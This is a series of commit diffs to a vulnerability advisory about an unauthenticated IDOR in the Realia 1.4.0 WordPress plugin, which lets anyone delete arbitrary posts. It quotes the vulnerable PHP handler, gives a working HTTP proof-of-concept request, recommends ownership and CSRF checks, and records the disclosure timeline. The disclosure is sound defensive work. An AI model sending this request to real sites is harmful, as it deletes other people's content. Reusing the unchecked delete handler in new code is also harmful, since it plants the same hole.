erwanlr · October 15, 2020 09:18 · Oct 15, 2020 · Oct 15, 2020 · Oct 15, 2020 · Oct 15, 2020
diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -44,4 +44,4 @@ Fix: It would be recommended to check that the post given belongs to the user ma
 - June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato.
 - August 5th, 2020 - Further investigations done after the lack of response from Envato revealed that the cause of the issue in the Premium theme was the free plugin Realia. Issue escalated to the WordPress plugin team.
 - August 14th, 2020 - WP Plugins team investigating.
-- October 15th, 2020 - No updates, the Realia plugin has also been closed from the WP repository.
+- October 15th, 2020 - No updates, the Realia plugin has also been closed from the WP repository. Disclosure.
diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -41,7 +41,7 @@ Given that this plugin has not been updated for the last three years, other issu
 Fix: It would be recommended to check that the post given belongs to the user making the request before deleting it. A CSRF check should also be done.
 
 # Timeline
-- June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato
-- August 5th, 2020 - Further investigations doner after the lack of response from Envato revealed that the cause of the issue in the Premium theme is the free plugin Realia. Issue escalated to the WordPress plugin team.
-- August 14th, 2020 - WP Plugins team investigating
+- June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato.
+- August 5th, 2020 - Further investigations done after the lack of response from Envato revealed that the cause of the issue in the Premium theme was the free plugin Realia. Issue escalated to the WordPress plugin team.
+- August 14th, 2020 - WP Plugins team investigating.
 - October 15th, 2020 - No updates, the Realia plugin has also been closed from the WP repository.
diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -1,4 +1,4 @@
-While investigating an [IDOR issue](https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt) in the [Home Sweet premium theme](https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953), allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
+While investigating an [IDOR issue](https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt) in the [Home Sweet](https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953) premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
 In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 

diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -1,4 +1,4 @@
-While investigating an [IDOR issue](https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt) on the [Home Sweet premium theme](https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953), allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
+While investigating an [IDOR issue](https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt) in the [Home Sweet premium theme](https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953), allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
 In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 

diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -42,6 +42,6 @@ Fix: It would be recommended to check that the post given belongs to the user ma
 
 # Timeline
 - June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato
-- August 5th, 2020 - Further investigations doner after the lack of response from Envato revealed that the cause of the issue in the Premium theme is a the Realia plugin. Issue escalated to the WordPress plugin team.
+- August 5th, 2020 - Further investigations doner after the lack of response from Envato revealed that the cause of the issue in the Premium theme is the free plugin Realia. Issue escalated to the WordPress plugin team.
 - August 14th, 2020 - WP Plugins team investigating
-- October 15th, 2020 - No updates, Realias plugin has also been closed from the WP repository.
+- October 15th, 2020 - No updates, the Realia plugin has also been closed from the WP repository.
diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -1,4 +1,4 @@
-While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
+While investigating an [IDOR issue](https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-06-17-homesweet-real-estate-wordpress-theme-v1-4.txt) on the [Home Sweet premium theme](https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953), allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
 In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 
@@ -38,4 +38,10 @@ property_id=7&remove_property_form=
 
 Given that this plugin has not been updated for the last three years, other issues may be present.
 
-Fix: It would be recommended to check that the post given belongs to the user making the request before deleting it. A CSRF check should also be done.
+Fix: It would be recommended to check that the post given belongs to the user making the request before deleting it. A CSRF check should also be done.
+
+# Timeline
+- June 18th, 2020 - Issue Confirmed on the Premium Theme & Escalated to Envato
+- August 5th, 2020 - Further investigations doner after the lack of response from Envato revealed that the cause of the issue in the Premium theme is a the Realia plugin. Issue escalated to the WordPress plugin team.
+- August 14th, 2020 - WP Plugins team investigating
+- October 15th, 2020 - No updates, Realias plugin has also been closed from the WP repository.
diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -1,6 +1,6 @@
 While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
-In fact, having this plugin installed (which some theme require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
+In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 
 In [includes/class-realia-submission.php](https://plugins.svn.wordpress.org/realia/trunk/includes/class-realia-submission.php)
 ```php

diff --git a/realia-1.4.0-idor.md b/realia-1.4.0-idor.md
@@ -1,6 +1,6 @@
 While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
-In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
+In fact, having this plugin installed (which some theme require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 
 In [includes/class-realia-submission.php](https://plugins.svn.wordpress.org/realia/trunk/includes/class-realia-submission.php)
 ```php

diff --git a/realia-1.4-idor.md → realia-1.4.0-idor.md b/realia-1.4-idor.md → realia-1.4.0-idor.md
diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -38,4 +38,4 @@ property_id=7&remove_property_form=
 
 Given that this plugin has not been updated for the last three years, other issues may be present.
 
-Fix: It would be recommended to check if the post given belongs to the user before deleting it.
+Fix: It would be recommended to check that the post given belongs to the user making the request before deleting it. A CSRF check should also be done.
diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -19,7 +19,7 @@ public static function process_remove_form() {
 }
 ```
 
-PoC:
+PoC (this will delete the Post with id `7`):
 ```
 POST / HTTP/1.1
 Host: 127.0.0.1

diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -1,4 +1,4 @@
-While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the cause of it.
+While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the root cause.
 
 In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 

diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -1,4 +1,4 @@
-While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [realia](https://wordpress.org/plugins/realia/) plugin was found to be the cause of it.
+While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [Realia](https://wordpress.org/plugins/realia/) plugin was found to be the cause of it.
 
 In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 

diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -36,4 +36,6 @@ Content-Length: 35
 property_id=7&remove_property_form=
 ```
 
-Given that this plugin has not been updated for the last three years, other issues may be present.
+Given that this plugin has not been updated for the last three years, other issues may be present.
+
+Fix: It would be recommended to check if the post given belongs to the user before deleting it.
diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -34,4 +34,6 @@ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Content-Length: 35
 
 property_id=7&remove_property_form=
-```
+```
+
+Given that this plugin has not been updated for the last three years, other issues may be present.
diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -1,8 +1,6 @@
-While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [realia](https://wordpress.org/plugins/realia/) plugin was
-found to be the cause of it.
+While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [realia](https://wordpress.org/plugins/realia/) plugin was found to be the cause of it.
 
-In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious
-request with the post ID to delete.
+In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
 
 In [includes/class-realia-submission.php](https://plugins.svn.wordpress.org/realia/trunk/includes/class-realia-submission.php)
 ```php

diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -9,16 +9,16 @@ In [includes/class-realia-submission.php](https://plugins.svn.wordpress.org/real
 add_action( 'init', array( __CLASS__, 'process_remove_form' ), 9999 );
 [...]
 public static function process_remove_form() {
-		if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
-			return;
-		}
+  if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
+    return;
+  }
 
-		if ( wp_delete_post( $_POST['property_id'] ) ) {
-			$_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
-		} else {
-			$_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
-		}
-	}
+  if ( wp_delete_post( $_POST['property_id'] ) ) {
+    $_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
+  } else {
+    $_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
+  }
+}
 ```
 
 PoC:

diff --git a/realia-1.4-idor.md b/realia-1.4-idor.md
@@ -0,0 +1,39 @@
+While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the [realia](https://wordpress.org/plugins/realia/) plugin was
+found to be the cause of it.
+
+In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious
+request with the post ID to delete.
+
+In [includes/class-realia-submission.php](https://plugins.svn.wordpress.org/realia/trunk/includes/class-realia-submission.php)
+```php
+add_action( 'init', array( __CLASS__, 'process_remove_form' ), 9999 );
+[...]
+public static function process_remove_form() {
+		if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
+			return;
+		}
+
+		if ( wp_delete_post( $_POST['property_id'] ) ) {
+			$_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
+		} else {
+			$_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
+		}
+	}
+```
+
+PoC:
+```
+POST / HTTP/1.1
+Host: 127.0.0.1
+User-Agent: PoC/Realia-1.4-IDOR
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 35
+
+property_id=7&remove_property_form=
+```